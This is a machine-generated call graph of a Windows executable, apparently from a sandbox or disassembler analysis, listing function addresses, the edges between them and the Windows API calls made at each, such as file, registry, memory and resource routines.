6000 406711 5998->6000 6002 403198 4 API calls 5999->6002 6001 403340 18 API calls 6000->6001 6001->5999 6003 406733 6002->6003 6004 406638 6003->6004 6005 406642 6004->6005 6006 406665 6004->6006 6232 406950 6005->6232 6008 40322c 4 API calls 6006->6008 6010 40666e 6008->6010 6009 406649 6009->6006 6011 406654 6009->6011 6010->5950 6012 403340 18 API calls 6011->6012 6013 406662 6012->6013 6013->5950 6015 403344 6014->6015 6016 4033a5 6014->6016 6017 4031e8 6015->6017 6018 40334c 6015->6018 6022 403254 18 API calls 6017->6022 6024 4031fc 6017->6024 6018->6016 6019 40335b 6018->6019 6023 4031e8 18 API calls 6018->6023 6021 403254 18 API calls 6019->6021 6020 403228 6020->5952 6026 403375 6021->6026 6022->6024 6023->6019 6024->6020 6025 4025ac 4 API calls 6024->6025 6025->6020 6027 4031e8 18 API calls 6026->6027 6028 4033a1 6027->6028 6028->5952 6030 408da8 18 API calls 6029->6030 6031 408df4 6030->6031 6031->5939 6033 405869 6032->6033 6034 405940 19 API calls 6033->6034 6035 40587b 6034->6035 6035->6035 6043 40955b 6036->6043 6037 409590 6039 40959d GetUserDefaultLangID 6037->6039 6044 409592 6037->6044 6038 409594 6048 407024 GetModuleHandleA GetProcAddress 6038->6048 6039->6044 6042 40956f 6042->5966 6043->6037 6043->6038 6043->6042 6044->6042 6045 4095cb GetACP 6044->6045 6046 4095ef 6044->6046 6045->6042 6045->6044 6046->6042 6047 409615 GetACP 6046->6047 6047->6042 6047->6046 6049 407067 6048->6049 6050 40705e 6048->6050 6051 407070 6049->6051 6052 4070a8 6049->6052 6059 403198 4 API calls 6050->6059 6069 406f68 6051->6069 6053 406f68 RegOpenKeyExA 6052->6053 6057 4070c1 6053->6057 6055 407089 6056 4070de 6055->6056 6072 406f5c 6055->6072 6061 40322c 4 API calls 6056->6061 6057->6056 6060 406f5c 20 API calls 6057->6060 6063 407120 6059->6063 6064 4070d5 RegCloseKey 6060->6064 6065 4070eb 6061->6065 6066 403198 4 API calls 6063->6066 6064->6056 6067 4032fc 18 API calls 6065->6067 6068 407128 6066->6068 6067->6050 6068->6044 6070 406f73 6069->6070 6071 406f79 RegOpenKeyExA 6069->6071 6070->6071 6071->6055 6075 406e10 6072->6075 6076 406e36 RegQueryValueExA 6075->6076 6077 406e59 6076->6077 6082 406e7b 6076->6082 6078 406e73 6077->6078 6077->6082 6083 403278 18 API calls 6077->6083 6084 403420 18 API calls 6077->6084 6080 403198 4 API calls 6078->6080 6079 403198 4 API calls 6081 406f47 RegCloseKey 6079->6081 6080->6082 6081->6056 6082->6079 6083->6077 6085 406eb0 RegQueryValueExA 6084->6085 6085->6076 6086 406ecc 6085->6086 6086->6082 6087 4034f0 18 API calls 6086->6087 6088 406f0e 6087->6088 6089 406f20 6088->6089 6091 403420 18 API calls 6088->6091 6090 4031e8 18 API calls 6089->6090 6090->6082 6091->6089 6134 406a58 6092->6134 6096 406a58 19 API calls 6098 406d36 6096->6098 6097 406d26 6097->6096 6099 406d72 6097->6099 6100 406d42 6098->6100 6102 406a34 21 API calls 6098->6102 6142 406888 6099->6142 6100->6099 6103 406d67 6100->6103 6104 406a58 19 API calls 6100->6104 6102->6100 6103->6099 6154 406cc8 GetWindowsDirectoryA 6103->6154 6107 406d5b 6104->6107 6107->6103 6110 406a34 21 API calls 6107->6110 6108 406638 19 API calls 6109 406d87 6108->6109 6111 40322c 4 API calls 6109->6111 6110->6103 6112 406d91 6111->6112 6113 4031b8 4 API calls 6112->6113 6114 406dab 6113->6114 6114->5978 6116 409244 6115->6116 6117 406638 19 API calls 6116->6117 6118 40925d 6117->6118 6119 40322c 4 API calls 6118->6119 6126 409268 6119->6126 6120 406978 20 API calls 6120->6126 6122 408dd8 18 API calls 6122->6126 6123 4033b4 18 API calls 6123->6126 6124 405890 18 API calls 6124->6126 6126->6120 6126->6122 6126->6123 6126->6124 6127 4092e4 6126->6127 6194 4091b0 6126->6194 6202 409034 6126->6202 6128 40322c 4 API calls 6127->6128 6129 4092ef 6128->6129 6130 4031b8 4 API calls 6129->6130 6131 409309 6130->6131 6132 403198 4 API calls 6131->6132 6133 409311 6132->6133 6133->5978 6135 4034f0 18 API calls 6134->6135 6136 406a6b 6135->6136 6137 406a82 GetEnvironmentVariableA 6136->6137 6141 406a95 6136->6141 6156 406dec 6136->6156 6137->6136 6138 406a8e 6137->6138 6139 403198 4 API calls 6138->6139 6139->6141 6141->6097 6151 406a34 6141->6151 6143 403414 6142->6143 6144 4068ab GetFullPathNameA 6143->6144 6145 4068b7 6144->6145 6146 4068ce 6144->6146 6145->6146 6148 4068bf 6145->6148 6147 40322c 4 API calls 6146->6147 6149 4068cc 6147->6149 6150 403278 18 API calls 6148->6150 6149->6108 6150->6149 6160 4069dc 6151->6160 6155 406ce9 6154->6155 6155->6099 6157 406dfa 6156->6157 6158 4034f0 18 API calls 6157->6158 6159 406e08 6158->6159 6159->6136 6167 406978 6160->6167 6162 4069fe 6163 406a06 GetFileAttributesA 6162->6163 6164 406a1b 6163->6164 6165 403198 4 API calls 6164->6165 6166 406a23 6165->6166 6166->6097 6177 406744 6167->6177 6169 4069b0 6172 4069c6 6169->6172 6173 4069bb 6169->6173 6171 406989 6171->6169 6184 406970 CharPrevA 6171->6184 6185 403454 6172->6185 6175 40322c 4 API calls 6173->6175 6176 4069c4 6175->6176 6176->6162 6180 406755 6177->6180 6178 4067b9 6179 406680 IsDBCSLeadByte 6178->6179 6181 4067b4 6178->6181 6179->6181 6180->6178 6183 406773 6180->6183 6181->6171 6183->6181 6192 406680 IsDBCSLeadByte 6183->6192 6184->6171 6186 403486 6185->6186 6187 403459 6185->6187 6188 403198 4 API calls 6186->6188 6187->6186 6190 40346d 6187->6190 6189 40347c 6188->6189 6189->6176 6191 403278 18 API calls 6190->6191 6191->6189 6193 406694 6192->6193 6193->6183 6195 403198 4 API calls 6194->6195 6197 4091d1 6195->6197 6199 4091fe 6197->6199 6211 4032a8 6197->6211 6214 403494 6197->6214 6200 403198 4 API calls 6199->6200 6201 409213 6200->6201 6201->6126 6203 408f70 2 API calls 6202->6203 6204 40904a 6203->6204 6205 40904e 6204->6205 6218 406a48 6204->6218 6205->6126 6208 409081 6209 408fac Wow64RevertWow64FsRedirection 6208->6209 6210 409089 6209->6210 6210->6126 6212 403278 18 API calls 6211->6212 6213 4032b5 6212->6213 6213->6197 6215 403498 6214->6215 6217 4034c3 6214->6217 6216 4034f0 18 API calls 6215->6216 6216->6217 6217->6197 6219 4069dc 21 API calls 6218->6219 6220 406a52 GetLastError 6219->6220 6220->6208 6222 406744 IsDBCSLeadByte 6221->6222 6224 406835 6222->6224 6223 40687f 6223->5990 6224->6223 6225 406680 IsDBCSLeadByte 6224->6225 6225->6224 6227 4068f3 6226->6227 6228 406820 IsDBCSLeadByte 6227->6228 6230 4068fe 6228->6230 6229 4066ea 6229->5995 6229->5996 6230->6229 6231 406680 IsDBCSLeadByte 6230->6231 6231->6230 6233 406957 6232->6233 6234 40695b 6232->6234 6233->6009 6237 406970 CharPrevA 6234->6237 6236 40696c 6236->6009 6237->6236 6812 408f30 6815 408dfc 6812->6815 6816 408e05 6815->6816 6817 403198 4 API calls 6816->6817 6818 408e13 6816->6818 6817->6816 6819 403932 6820 403924 6819->6820 6821 40374c VariantClear 6820->6821 6822 40392c 6821->6822 5382 4075c4 SetFilePointer 5383 4075f7 5382->5383 5384 4075e7 GetLastError 5382->5384 5384->5383 5385 4075f0 5384->5385 5387 40748c GetLastError 5385->5387 5390 4073ec 5387->5390 5391 407284 19 API calls 5390->5391 5392 407414 5391->5392 5393 407434 5392->5393 5394 405194 33 API calls 5392->5394 5395 405890 18 API calls 5393->5395 5394->5393 5396 407443 5395->5396 5397 403198 4 API calls 5396->5397 5398 407460 5397->5398 5398->5383 6413 4076c8 WriteFile 6414 4076e8 6413->6414 6415 4076ef 6413->6415 6416 40748c 35 API calls 6414->6416 6417 407700 6415->6417 6418 4073ec 34 API calls 6415->6418 6416->6415 6418->6417 6419 402ccc 6422 402cfe 6419->6422 6423 402cdd 6419->6423 6420 402d88 RtlUnwind 6421 403154 4 API calls 6420->6421 6421->6422 6423->6420 6423->6422 6424 402b28 RaiseException 6423->6424 6425 402d7f 6424->6425 6425->6420 6831 403fcd 6832 403f07 4 API calls 6831->6832 6833 403fd6 6832->6833 6834 403e9c 4 API calls 6833->6834 6835 403fe2 6834->6835 6432 4024d0 6433 4024e4 6432->6433 6434 4024e9 6432->6434 6437 401918 4 API calls 6433->6437 6435 402518 6434->6435 6436 40250e RtlEnterCriticalSection 6434->6436 6439 4024ed 6434->6439 6447 402300 6435->6447 6436->6435 6437->6434 6440 402525 6443 402581 6440->6443 6444 402577 RtlLeaveCriticalSection 6440->6444 6442 401fd4 14 API calls 6445 402531 6442->6445 6444->6443 6445->6440 6446 40215c 9 API calls 6445->6446 6446->6440 6448 402314 6447->6448 6450 402335 6448->6450 6451 4023b8 6448->6451 6449 402344 6449->6440 6449->6442 6450->6449 6453 401b74 9 API calls 6450->6453 6451->6449 6452 401d80 9 API calls 6451->6452 6455 402455 6451->6455 6457 401e84 6451->6457 6452->6451 6453->6449 6455->6449 6456 401d00 9 API calls 6455->6456 6456->6449 6462 401768 6457->6462 6459 401e99 6460 401ea6 6459->6460 6461 401dcc 9 API calls 6459->6461 6460->6451 6461->6460 6463 401787 6462->6463 6464 40183b 6463->6464 6465 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6463->6465 6466 40132c LocalAlloc 6463->6466 6468 401821 6463->6468 6470 4017d6 6463->6470 6467 4015c4 VirtualAlloc 6464->6467 6471 4017e7 6464->6471 6465->6463 6466->6463 6467->6471 6469 40150c VirtualFree 6468->6469 6469->6471 6472 40150c VirtualFree 6470->6472 6471->6459 6472->6471 6473 4028d2 6474 4028da 6473->6474 6475 403554 4 API calls 6474->6475 6476 4028ef 6474->6476 6475->6474 6477 4025ac 4 API calls 6476->6477 6478 4028f4 6477->6478 6836 4019d3 6837 4019ba 6836->6837 6838 4019c3 RtlLeaveCriticalSection 6837->6838 6839 4019cd 6837->6839 6838->6839 5399 407fd4 5400 407fe6 5399->5400 5402 407fed 5399->5402 5410 407f10 5400->5410 5404 408015 5402->5404 5405 408017 5402->5405 5408 408021 5402->5408 5403 40804e 5424 407e2c 5404->5424 5421 407d7c 5405->5421 5407 407d7c 33 API calls 5407->5403 5408->5403 5408->5407 5411 407f25 5410->5411 5412 407d7c 33 API calls 5411->5412 5413 407f34 5411->5413 5412->5413 5414 407f6e 5413->5414 5415 407d7c 33 API calls 5413->5415 5416 407f82 5414->5416 5417 407d7c 33 API calls 5414->5417 5415->5414 5420 407fae 5416->5420 5431 407eb8 5416->5431 5417->5416 5420->5402 5434 4058c4 5421->5434 5423 407d9e 5423->5408 5425 405194 33 API calls 5424->5425 5426 407e57 5425->5426 5442 407de4 5426->5442 5428 407e5f 5429 403198 4 API calls 5428->5429 5430 407e74 5429->5430 5430->5408 5432 407ec7 VirtualFree 5431->5432 5433 407ed9 VirtualAlloc 5431->5433 5432->5433 5433->5420 5436 4058d0 5434->5436 5435 405194 33 API calls 5437 4058fd 5435->5437 5436->5435 5438 4031e8 18 API calls 5437->5438 5439 405908 5438->5439 5440 403198 4 API calls 5439->5440 5441 40591d 5440->5441 5441->5423 5443 4058c4 33 API calls 5442->5443 5444 407e06 5443->5444 5444->5428 6479 405ad4 6480 405adc 6479->6480 6481 405ae4 6479->6481 6482 405ae2 6480->6482 6483 405aeb 6480->6483 6486 405a4c 6482->6486 6484 405940 19 API calls 6483->6484 6484->6481 6487 405a54 6486->6487 6488 405a6e 6487->6488 6489 403154 4 API calls 6487->6489 6490 405a73 6488->6490 6491 405a8a 6488->6491 6489->6487 6492 405940 19 API calls 6490->6492 6493 403154 4 API calls 6491->6493 6494 405a86 6492->6494 6495 405a8f 6493->6495 6497 403154 4 API calls 6494->6497 6496 4059b0 33 API calls 6495->6496 6496->6494 6498 405ab8 6497->6498 6499 403154 4 API calls 6498->6499 6500 405ac6 6499->6500 6500->6481 5912 40a9de 5913 40aa03 5912->5913 5914 407918 InterlockedExchange 5913->5914 5915 40aa2d 5914->5915 5916 40aa3d 5915->5916 5917 409ae8 18 API calls 5915->5917 5922 4076ac SetEndOfFile 5916->5922 5917->5916 5919 40aa59 5920 4025ac 4 API calls 5919->5920 5921 40aa90 5920->5921 5923 4076c3 5922->5923 5924 4076bc 5922->5924 5923->5919 5925 40748c 35 API calls 5924->5925 5925->5923 6843 402be9 RaiseException 6844 402c04 6843->6844 6511 402af2 6512 402afe 6511->6512 6515 402ed0 6512->6515 6516 403154 4 API calls 6515->6516 6518 402ee0 6516->6518 6517 402b03 6518->6517 6520 402b0c 6518->6520 6521 402b25 6520->6521 6522 402b15 RaiseException 6520->6522 6521->6517 6522->6521 5450 40a5f8 5493 4030dc 5450->5493 5452 40a60e 5496 4042e8 5452->5496 5454 40a613 5499 40457c GetModuleHandleA GetProcAddress 5454->5499 5458 40a61d 5507 4065c8 5458->5507 5460 40a622 5516 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5460->5516 5469 40a665 5538 406c2c 5469->5538 5471 4031e8 18 API calls 5472 40a683 5471->5472 5552 4074e0 5472->5552 5478 407918 InterlockedExchange 5480 40a6d2 5478->5480 5479 40a710 5572 4074a0 5479->5572 5480->5479 5609 409ae8 5480->5609 5482 40a751 5576 407a28 5482->5576 5483 40a736 5483->5482 5484 409ae8 18 API calls 5483->5484 5484->5482 5486 40a776 5586 408b08 5486->5586 5490 40a7bc 5491 408b08 35 API calls 5490->5491 5492 40a7f5 5490->5492 5491->5490 5619 403094 5493->5619 5495 4030e1 GetModuleHandleA GetCommandLineA 5495->5452 5497 403154 4 API calls 5496->5497 5498 404323 5496->5498 5497->5498 5498->5454 5500 404598 5499->5500 5501 40459f GetProcAddress 5499->5501 5500->5501 5502 4045b5 GetProcAddress 5501->5502 5503 4045ae 5501->5503 5504 4045c4 SetProcessDEPPolicy 5502->5504 5505 4045c8 5502->5505 5503->5502 5504->5505 5506 404624 6F9C1CD0 5505->5506 5506->5458 5620 405ca8 5507->5620 5517 4090f7 5516->5517 5704 406fa0 SetErrorMode 5517->5704 5520 407284 19 API calls 5521 409127 5520->5521 5522 403198 4 API calls 5521->5522 5523 40913c 5522->5523 5524 409b78 GetSystemInfo VirtualQuery 5523->5524 5525 409c2c 5524->5525 5528 409ba2 5524->5528 5530 409768 5525->5530 5526 409c0d VirtualQuery 5526->5525 5526->5528 5527 409bcc VirtualProtect 5527->5528 5528->5525 5528->5526 5528->5527 5529 409bfb VirtualProtect 5528->5529 5529->5526 5710 406bd0 GetCommandLineA 5530->5710 5532 409850 5533 4031b8 4 API calls 5532->5533 5535 40986a 5533->5535 5534 406c2c 20 API calls 5537 409785 5534->5537 5535->5469 5602 409c88 5535->5602 5536 403454 18 API calls 5536->5537 5537->5532 5537->5534 5537->5536 5539 406c53 GetModuleFileNameA 5538->5539 5540 406c77 GetCommandLineA 5538->5540 5541 403278 18 API calls 5539->5541 5548 406c7c 5540->5548 5542 406c75 5541->5542 5546 406ca4 5542->5546 5543 406c81 5544 403198 4 API calls 5543->5544 5547 406c89 5544->5547 5545 406af0 18 API calls 5545->5548 5549 403198 4 API calls 5546->5549 5550 40322c 4 API calls 5547->5550 5548->5543 5548->5545 5548->5547 5551 406cb9 5549->5551 5550->5546 5551->5471 5553 4074ea 5552->5553 5717 407576 5553->5717 5720 407578 5553->5720 5554 407516 5555 40752a 5554->5555 5556 40748c 35 API calls 5554->5556 5559 409c34 FindResourceA 5555->5559 5556->5555 5560 409c49 5559->5560 5561 409c4e SizeofResource 5559->5561 5562 409ae8 18 API calls 5560->5562 5563 409c60 LoadResource 5561->5563 5564 409c5b 5561->5564 5562->5561 5566 409c73 LockResource 5563->5566 5567 409c6e 5563->5567 5565 409ae8 18 API calls 5564->5565 5565->5563 5569 409c84 5566->5569 5570 409c7f 5566->5570 5568 409ae8 18 API calls 5567->5568 5568->5566 5569->5478 5569->5480 5571 409ae8 18 API calls 5570->5571 5571->5569 5573 4074b4 5572->5573 5574 4074c4 5573->5574 5575 4073ec 34 API calls 5573->5575 5574->5483 5575->5574 5577 407a35 5576->5577 5578 405890 18 API calls 5577->5578 5579 407a89 5577->5579 5578->5579 5580 407918 InterlockedExchange 5579->5580 5581 407a9b 5580->5581 5582 405890 18 API calls 5581->5582 5583 407ab1 5581->5583 5582->5583 5584 405890 18 API calls 5583->5584 5585 407af4 5583->5585 5584->5585 5585->5486 5590 408b82 5586->5590 5597 408b39 5586->5597 5587 408bcd 5723 407cb8 5587->5723 5589 408be4 5593 4031b8 4 API calls 5589->5593 5590->5587 5592 4034f0 18 API calls 5590->5592 5598 4031e8 18 API calls 5590->5598 5599 403420 18 API calls 5590->5599 5601 407cb8 35 API calls 5590->5601 5591 4034f0 18 API calls 5591->5597 5592->5590 5596 408bfe 5593->5596 5594 403420 18 API calls 5594->5597 5595 4031e8 18 API calls 5595->5597 5616 404c20 5596->5616 5597->5590 5597->5591 5597->5594 5597->5595 5600 407cb8 35 API calls 5597->5600 5598->5590 5599->5590 5600->5597 5601->5590 5603 40322c 4 API calls 5602->5603 5604 409cab 5603->5604 5605 409cba MessageBoxA 5604->5605 5606 409ccf 5605->5606 5607 403198 4 API calls 5606->5607 5608 409cd7 5607->5608 5608->5469 5610 409af1 5609->5610 5611 409b09 5609->5611 5612 405890 18 API calls 5610->5612 5613 405890 18 API calls 5611->5613 5615 409b03 5612->5615 5614 409b1a 5613->5614 5614->5479 5615->5479 5745 402594 5616->5745 5618 404c2b 5618->5490 5619->5495 5621 405940 19 API calls 5620->5621 5622 405cb9 5621->5622 5623 405280 GetSystemDefaultLCID 5622->5623 5627 4052b6 5623->5627 5624 40520c 19 API calls 5624->5627 5625 4031e8 18 API calls 5625->5627 5626 404cdc 19 API calls 5626->5627 5627->5624 5627->5625 5627->5626 5631 405318 5627->5631 5628 4031e8 18 API calls 5628->5631 5629 404cdc 19 API calls 5629->5631 5630 40520c 19 API calls 5630->5631 5631->5628 5631->5629 5631->5630 5632 40539b 5631->5632 5633 4031b8 4 API calls 5632->5633 5634 4053b5 5633->5634 5635 4053c4 GetSystemDefaultLCID 5634->5635 5692 40520c GetLocaleInfoA 5635->5692 5638 4031e8 18 API calls 5639 405404 5638->5639 5640 40520c 19 API calls 5639->5640 5641 405419 5640->5641 5642 40520c 19 API calls 5641->5642 5643 40543d 5642->5643 5698 405258 GetLocaleInfoA 5643->5698 5646 405258 GetLocaleInfoA 5647 40546d 5646->5647 5648 40520c 19 API calls 5647->5648 5649 405487 5648->5649 5650 405258 GetLocaleInfoA 5649->5650 5651 4054a4 5650->5651 5652 40520c 19 API calls 5651->5652 5653 4054be 5652->5653 5654 4031e8 18 API calls 5653->5654 5655 4054cb 5654->5655 5656 40520c 19 API calls 5655->5656 5657 4054e0 5656->5657 5658 4031e8 18 API calls 5657->5658 5659 4054ed 5658->5659 5660 405258 GetLocaleInfoA 5659->5660 5661 4054fb 5660->5661 5662 40520c 19 API calls 5661->5662 5663 405515 5662->5663 5664 4031e8 18 API calls 5663->5664 5665 405522 5664->5665 5666 40520c 19 API calls 5665->5666 5667 405537 5666->5667 5668 4031e8 18 API calls 5667->5668 5669 405544 5668->5669 5670 40520c 19 API calls 5669->5670 5671 405559 5670->5671 5672 405576 5671->5672 5673 405567 5671->5673 5675 40322c 4 API calls 5672->5675 5700 40322c 5673->5700 5676 405574 5675->5676 5677 40520c 19 API calls 5676->5677 5678 405598 5677->5678 5679 4055b5 5678->5679 5680 4055a6 5678->5680 5682 403198 4 API calls 5679->5682 5681 40322c 4 API calls 5680->5681 5683 4055b3 5681->5683 5682->5683 5684 4033b4 18 API calls 5683->5684 5685 4055d7 5684->5685 5686 4033b4 18 API calls 5685->5686 5687 4055f1 5686->5687 5688 4031b8 4 API calls 5687->5688 5689 40560b 5688->5689 5690 405cf4 GetVersionExA 5689->5690 5691 405d0b 5690->5691 5691->5460 5693 405233 5692->5693 5694 405245 5692->5694 5695 403278 18 API calls 5693->5695 5696 40322c 4 API calls 5694->5696 5697 405243 5695->5697 5696->5697 5697->5638 5699 405274 5698->5699 5699->5646 5702 403230 5700->5702 5701 403252 5701->5676 5702->5701 5703 4025ac 4 API calls 5702->5703 5703->5701 5708 403414 5704->5708 5707 406fee 5707->5520 5709 403418 LoadLibraryA 5708->5709 5709->5707 5711 406af0 18 API calls 5710->5711 5712 406bf3 5711->5712 5713 406c05 5712->5713 5714 406af0 18 API calls 5712->5714 5715 403198 4 API calls 5713->5715 5714->5712 5716 406c1a 5715->5716 5716->5537 5718 407578 5717->5718 5719 4075b7 CreateFileA 5718->5719 5719->5554 5721 403414 5720->5721 5722 4075b7 CreateFileA 5721->5722 5722->5554 5724 407cd3 5723->5724 5728 407cc8 5723->5728 5729 407c5c 5724->5729 5727 405890 18 API calls 5727->5728 5728->5589 5730 407c70 5729->5730 5731 407caf 5729->5731 5730->5731 5733 407bac 5730->5733 5731->5727 5731->5728 5734 407bb7 5733->5734 5735 407bc8 5733->5735 5736 405890 18 API calls 5734->5736 5737 4074a0 34 API calls 5735->5737 5736->5735 5738 407bdc 5737->5738 5739 4074a0 34 API calls 5738->5739 5740 407bfd 5739->5740 5741 407918 InterlockedExchange 5740->5741 5742 407c12 5741->5742 5743 407c28 5742->5743 5744 405890 18 API calls 5742->5744 5743->5730 5744->5743 5746 402598 5745->5746 5748 4025a2 5745->5748 5751 401fd4 5746->5751 5747 40259e 5747->5748 5749 403154 4 API calls 5747->5749 5748->5618 5748->5748 5749->5748 5752 401fe8 5751->5752 5753 401fed 5751->5753 5762 401918 RtlInitializeCriticalSection 5752->5762 5755 402012 RtlEnterCriticalSection 5753->5755 5756 40201c 5753->5756 5759 401ff1 5753->5759 5755->5756 5756->5759 5769 401ee0 5756->5769 5759->5747 5760 402147 5760->5747 5761 40213d RtlLeaveCriticalSection 5761->5760 5763 40193c RtlEnterCriticalSection 5762->5763 5764 401946 5762->5764 5763->5764 5765 401964 LocalAlloc 5764->5765 5766 40197e 5765->5766 5767 4019c3 RtlLeaveCriticalSection 5766->5767 5768 4019cd 5766->5768 5767->5768 5768->5753 5772 401ef0 5769->5772 5770 401f1c 5774 401f40 5770->5774 5780 401d00 5770->5780 5772->5770 5772->5774 5775 401e58 5772->5775 5774->5760 5774->5761 5784 4016d8 5775->5784 5778 401e75 5778->5772 5781 401d4e 5780->5781 5782 401d1e 5780->5782 5781->5782 5853 401c68 5781->5853 5782->5774 5787 4016f4 5784->5787 5786 4016fe 5809 4015c4 5786->5809 5787->5786 5789 40175b 5787->5789 5792 40174f 5787->5792 5801 401430 5787->5801 5813 40132c 5787->5813 5789->5778 5794 401dcc 5789->5794 5791 40170a 5791->5789 5817 40150c 5792->5817 5827 401d80 5794->5827 5797 40132c LocalAlloc 5799 401df0 5797->5799 5798 401df8 5798->5778 5799->5798 5831 401b44 5799->5831 5802 40143f VirtualAlloc 5801->5802 5804 40146c 5802->5804 5805 40148f 5802->5805 5821 4012e4 5804->5821 5805->5787 5808 40147c VirtualFree 5808->5805 5811 40160a 5809->5811 5810 40163a 5810->5791 5811->5810 5812 401626 VirtualAlloc 5811->5812 5812->5810 5812->5811 5814 401348 5813->5814 5815 4012e4 LocalAlloc 5814->5815 5816 40138f 5815->5816 5816->5787 5820 40153b 5817->5820 5818 401594 5818->5789 5819 401568 VirtualFree 5819->5820 5820->5818 5820->5819 5824 40128c 5821->5824 5825 401298 LocalAlloc 5824->5825 5826 4012aa 5824->5826 5825->5826 5826->5805 5826->5808 5828 401d92 5827->5828 5829 401d89 5827->5829 5828->5797 5829->5828 5836 401b74 5829->5836 5832 401b61 5831->5832 5833 401b52 5831->5833 5832->5798 5834 401d00 9 API calls 5833->5834 5835 401b5f 5834->5835 5835->5798 5839 40215c 5836->5839 5838 401b95 5838->5828 5840 40217a 5839->5840 5841 402175 5839->5841 5843 4021ab RtlEnterCriticalSection 5840->5843 5846 40217e 5840->5846 5851 4021b5 5840->5851 5842 401918 4 API calls 5841->5842 5842->5840 5843->5851 5844 402244 5844->5846 5849 401d80 7 API calls 5844->5849 5845 4021c1 5847 4022e3 RtlLeaveCriticalSection 5845->5847 5848 4022ed 5845->5848 5846->5838 5847->5848 5848->5838 5849->5846 5850 402270 5850->5845 5852 401d00 7 API calls 5850->5852 5851->5844 5851->5845 5851->5850 5852->5845 5854 401c7a 5853->5854 5855 401c9d 5854->5855 5856 401caf 5854->5856 5866 40188c 5855->5866 5858 40188c 3 API calls 5856->5858 5859 401cad 5858->5859 5860 401b44 9 API calls 5859->5860 5865 401cc5 5859->5865 5861 401cd4 5860->5861 5862 401cee 5861->5862 5876 401b98 5861->5876 5881 4013a0 5862->5881 5865->5782 5867 4018b2 5866->5867 5875 40190b 5866->5875 5885 401658 5867->5885 5870 40132c LocalAlloc 5871 4018cf 5870->5871 5872 40150c VirtualFree 5871->5872 5873 4018e6 5871->5873 5872->5873 5874 4013a0 LocalAlloc 5873->5874 5873->5875 5874->5875 5875->5859 5877 401bab 5876->5877 5878 401b9d 5876->5878 5877->5862 5879 401b74 9 API calls 5878->5879 5880 401baa 5879->5880 5880->5862 5882 4013ab 5881->5882 5883 4012e4 LocalAlloc 5882->5883 5884 4013c6 5882->5884 5883->5884 5884->5865 5887 40168f 5885->5887 5886 4016cf 5886->5870 5887->5886 5888 4016a9 VirtualFree 5887->5888 5888->5887 6845 402dfa 6846 402e0d 6845->6846 6848 402e26 6845->6848 6849 402ba4 6846->6849 6850 402bc9 6849->6850 6851 402bad 6849->6851 6850->6848 6852 402bb5 RaiseException 6851->6852 6852->6850 6853 4075fa GetFileSize 6854 407626 6853->6854 6855 407616 GetLastError 6853->6855 6855->6854 6856 40761f 6855->6856 6857 40748c 35 API calls 6856->6857 6857->6854 6858 406ffb 6859 407008 SetErrorMode 6858->6859 6527 403a80 CloseHandle 6528 403a90 6527->6528 6529 403a91 GetLastError 6527->6529 6530 404283 6531 4042c3 6530->6531 6532 403154 4 API calls 6531->6532 6533 404323 6532->6533 6860 404185 6861 4041ff 6860->6861 6862 403154 4 API calls 6861->6862 6863 4041cc 6861->6863 6864 404323 6862->6864 6534 403e87 6535 403e4c 6534->6535 6536 403e62 6535->6536 6537 403e7b 6535->6537 6540 403e67 6535->6540 6543 403cc8 6536->6543 6538 402674 4 API calls 6537->6538 6541 403e78 6538->6541 6540->6541 6547 402674 6540->6547 6544 403cd6 6543->6544 6545 402674 4 API calls 6544->6545 6546 403ceb 6544->6546 6545->6546 6546->6540 6548 403154 4 API calls 6547->6548 6549 40267a 6548->6549 6549->6541 6558 407e90 6559 407eb8 VirtualFree 6558->6559 6560 407e9d 6559->6560 6563 403e95 6564 403e4c 6563->6564 6565 403e62 6564->6565 6566 403e7b 6564->6566 6569 403e67 6564->6569 6568 403cc8 4 API calls 6565->6568 6567 402674 4 API calls 6566->6567 6570 403e78 6567->6570 6568->6569 6569->6570 6571 402674 4 API calls 6569->6571 6571->6570 6572 40ac97 6581 4096fc 6572->6581 6575 402f24 5 API calls 6576 40aca1 6575->6576 6577 403198 4 API calls 6576->6577 6578 40acc0 6577->6578 6579 403198 4 API calls 6578->6579 6580 40acc8 6579->6580 6590 4056ac 6581->6590 6583 409745 6586 403198 4 API calls 6583->6586 6584 409717 6584->6583 6596 40720c 6584->6596 6588 40975a 6586->6588 6587 409735 6589 40973d MessageBoxA 6587->6589 6588->6575 6588->6576 6589->6583 6591 403154 4 API calls 6590->6591 6593 4056b1 6591->6593 6592 4056c9 6592->6584 6593->6592 6594 403154 4 API calls 6593->6594 6595 4056bf 6594->6595 6595->6584 6597 4056ac 4 API calls 6596->6597 6598 40721b 6597->6598 6599 407221 6598->6599 6602 40722f 6598->6602 6600 40322c 4 API calls 6599->6600 6601 40722d 6600->6601 6601->6587 6603 40724b 6602->6603 6604 40723f 6602->6604 6614 4032b8 6603->6614 6607 4071d0 6604->6607 6608 40322c 4 API calls 6607->6608 6609 4071df 6608->6609 6610 4071fc 6609->6610 6611 406950 CharPrevA 6609->6611 6610->6601 6612 4071eb 6611->6612 6612->6610 6613 4032fc 18 API calls 6612->6613 6613->6610 6615 403278 18 API calls 6614->6615 6616 4032c2 6615->6616 6616->6601 6617 403a97 6618 403aac 6617->6618 6619 403ab2 6618->6619 6620 403bbc GetStdHandle 6618->6620 6621 403b0e CreateFileA 6618->6621 6622 403c17 GetLastError 6620->6622 6634 403bba 6620->6634 6621->6622 6623 403b2c 6621->6623 6622->6619 6624 403b3b GetFileSize 6623->6624 6623->6634 6624->6622 6626 403b4e SetFilePointer 6624->6626 6626->6622 6630 403b6a ReadFile 6626->6630 6627 403be7 GetFileType 6627->6619 6629 403c02 CloseHandle 6627->6629 6629->6619 6630->6622 6631 403b8c 6630->6631 6632 403b9f SetFilePointer 6631->6632 6631->6634 6632->6622 6633 403bb0 SetEndOfFile 6632->6633 6633->6622 6633->6634 6634->6619 6634->6627 6639 40aaa2 6640 40aad2 6639->6640 6641 40aadc CreateWindowExA SetWindowLongA 6640->6641 6642 405194 33 API calls 6641->6642 6643 40ab5f 6642->6643 6644 4032fc 18 API calls 6643->6644 6645 40ab6d 6644->6645 6646 4032fc 18 API calls 6645->6646 6647 40ab7a 6646->6647 6648 406b7c 19 API calls 6647->6648 6649 40ab86 6648->6649 6650 4032fc 18 API calls 6649->6650 6651 40ab8f 6650->6651 6652 4099ec 43 API calls 6651->6652 6653 40aba1 6652->6653 6654 4098cc 19 API calls 6653->6654 6655 40abb4 6653->6655 6654->6655 6656 40abed 6655->6656 6657 4094d8 9 API calls 6655->6657 6658 40ac06 6656->6658 6661 40ac00 RemoveDirectoryA 